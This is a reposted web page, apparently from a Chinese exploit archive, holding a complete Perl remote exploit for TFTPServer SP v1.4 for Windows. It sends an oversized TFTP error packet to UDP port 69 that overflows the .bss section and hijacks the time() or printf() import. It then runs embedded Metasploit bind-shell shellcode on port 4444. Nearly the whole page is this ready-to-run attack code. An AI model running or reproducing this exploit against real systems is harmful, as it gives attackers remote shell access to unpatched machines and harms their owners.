TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
|
来源:tixxdz@gmail.com 作者:tixxDZ 发布时间:2008-05-09
|
|
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit # The Service or the RunStandAlone version. # URL: http://sourceforge.net/projects/tftp-server/ # # Author: tix or tixxDZ <tixxdz@gmail.com> # Date: 07/05/2008 # # Tested on Windows XP SP2 French not patched # # TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet # Other versions may also be vulnerable. # # TFTPServer respect the RFC 1350 for Error packets, lot of other # TFTP Servers don't respect it. # TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00" # # BUFFER is at 0041B3AB in the .bss section. # This exploit will overwrite all the .bss section and some portion of the .idata section # to patch functions addresses in the IAT. # # For the TFTPServer Service we will patch the time() function # For the TFTPServer StandAlone program we will patch the printf() function # # BUFFER = NOPS + SHELLCODE + RET # we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict; use IO::Socket::INET;
my $target = shift || die "Usage: $0 <target> <type>\n <type> : type of the program\n". "\t<s> for a TFTP service\n\t<p> for a TFTP simple program\n";
my $type = defined $ARGV[0] ? shift : 's';
my $shellcode = # windows/shell_bind_tcp - 500 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=4444 "\x3d\x71\x41\xbf\x75\x04\x66\x32\xfc\x2f\x84\xd4\x15\x24" . "\x0a\xfd\x92\xb5\x48\x76\x4b\x19\xe3\x73\x0c\x77\x4f\x0d" . "\x4a\x43\x4e\x7c\x75\x1d\x7d\x28\xd6\x96\x79\x14\x91\x7b" . "\x1c\xb2\x72\x34\xa9\x9f\xb1\x73\x49\x70\x25\x98\x7f\x13" . "\xf5\x88\xe1\x3f\x74\x2c\xba\x7e\x20\xc1\xd1\xe2\x12\xe0" . "\x11\xd6\x6b\xd0\xe3\x40\xbf\x9f\x4a\x2f\xb9\xa8\x3d\xd2" . "\xeb\x0c\x7a\x2b\xf9\x4b\x49\x71\x05\x76\x37\xb4\xb3\x86" . "\xd5\x41\x97\x66\xba\x91\x46\xb5\x47\x48\x9b\x35\xa9\x43" . "\x4f\xbe\xb7\x93\xfc\x2c\x25\x90\x3c\x99\x92\x77\x02\xfd" . "\xb8\x42\x98\x15\x14\xb6\x3f\xd4\x27\xf8\x2d\xf5\x24\x1c" . "\x67\xbb\x1d\x4e\xb0\xb2\x0d\xb1\x34\x04\x96\xbb\xa0\x0c" . "\xb8\xde\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85\xc0\x75" . "\xf7\xc3\xfc\xe8\xee\xff\xff\xff\x5c\x66\x53\x93\x74\x8e" . "\x5c\xd3\x7b\x11\x28\x40\xa7\xf6\xa5\xdc\x9b\x7d\xc5\xdb" . "\x9b\x80\xd9\x6f\x14\x9b\xae\x2f\x8a\x9a\x5b\x86\x41\xa8" . "\x10\x18\xbb\xe0\xe6\x82\xef\x87\x27\xc0\xe8\x46\x6d\x24" . "\xf7\x8a\x99\xc3\xcc\x5e\x7a\x04\x47\xba\x09\x0b\x83\x45" . "\xe5\xd2\x40\x49\xb2\x91\x09\x4e\x45\x4d\xb6\x42\xce\x18" . "\xd4\xbe\xcc\x7b\xe7\x8e\x37\x1f\x6c\xb3\xf7\x6b\x32\x38" . "\x73\x1b\xae\xed\x08\x9c\xc6\xb3\x66\x93\x98\x45\x9b\xfb" . "\xdb\x8c\x05\xaf\x45\x59\xf9\x7d\xe1\xee\x8e\xb3\xae\x44" . "\x8e\x64\x38\xae\x9d\x79\x83\x60\xa1\x54\xac\x09\xb8\x3f" . "\xd3\xe7\x4b\xc2\x86\x9d\x49\x3d\xf8\x0a\x97\xc8\x0d\x67" . "\x70\x34\x3b\x2b\x2c\x99\x90\x9f\x91\x4e\x55\x73\xe9\xa1" . "\x3f\x1b\x04\x1e\xd9\x88\xaf\x7f\xb0\x47\x14\x65\xca\x50" . "\x03\x65\xfc\x35\xbc\xc8\x55\x35\x6c\x82\xf1\x64\xa3\xba" . "\xae\x89\x6a\x6f\x05\x89\x43\xf8\x40\x3c\xe2\xb0\xdd\x40" . "\x3c\x12\xb5\xea\x94\x6c\xe5\x80\x7f\x74\x7c\x61\x06\x2d" . "\x81\xbb\xac\x2e\xad\x22\x25\xb5\x2b\xc3\xda\x58\x3a\xf6" . "\x77\xf3\x65\xd0\x4b\x7a\x72\x48\x10\xf4\x9e\xbc\x58\xf5" . "\xf4\x41\x1a\xd7\xf6\xfc\xb7\xb4\x8b\x7b\xf0\x11\x38\xd0" . "\x68\x14\xc0\x94\x7f\x27\x49\x9f\x80\x01\xea\x48\x2d\xff" . "\x5d\x26\xbb\xfe\x0c\x99\x6e\x50\x51\xc9\xf9\xff\x74\xef" . "\x37\xac\x79\x26\xad\xac\x7a\xf0\xcd\x83\x0f\xa8\xcd\xa7" . "\xcb\x33\xd1\x7e\x81\x44\xfd\x17\xd5\x31\xfa\xb8\x46\xb9" . "\xd5\xb8\xb8\x45\xda\x46\x38\x46\xda\x46";
my ($RET,$buffer) = "\x01\x01\x42\x00"; # in the .idata section
if ($type =~ /p/i) { # "\x00\x05" + 20411 bytes needed to patch the printf() function at 00420360 # --------------------------------------------------------------------------- # 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>] # --------------------------------------------------------------------------- print STDOUT "Exploiting TFTPServer RunStandAlone program\n"; $buffer = "\x90" x 19907 . $shellcode . $RET; } else { # "\x00\x05" + 20459 bytes needed to patch the time() function at 00420390 # ------------------------------------------------------------------------ # 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>] # ------------------------------------------------------------------------ print STDOUT "Exploiting TFTPServer Service program\n";
$buffer = "\x90" x 19955 . $shellcode . $RET; }
my $sock = IO::Socket::INET->new( PeerAddr => $target, PeerPort => 69, Proto => 'udp') or die "error: $!\n";
$sock->send("\x00\x05" . $buffer, 0); print STDOUT "done.\n"; exit 0;
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|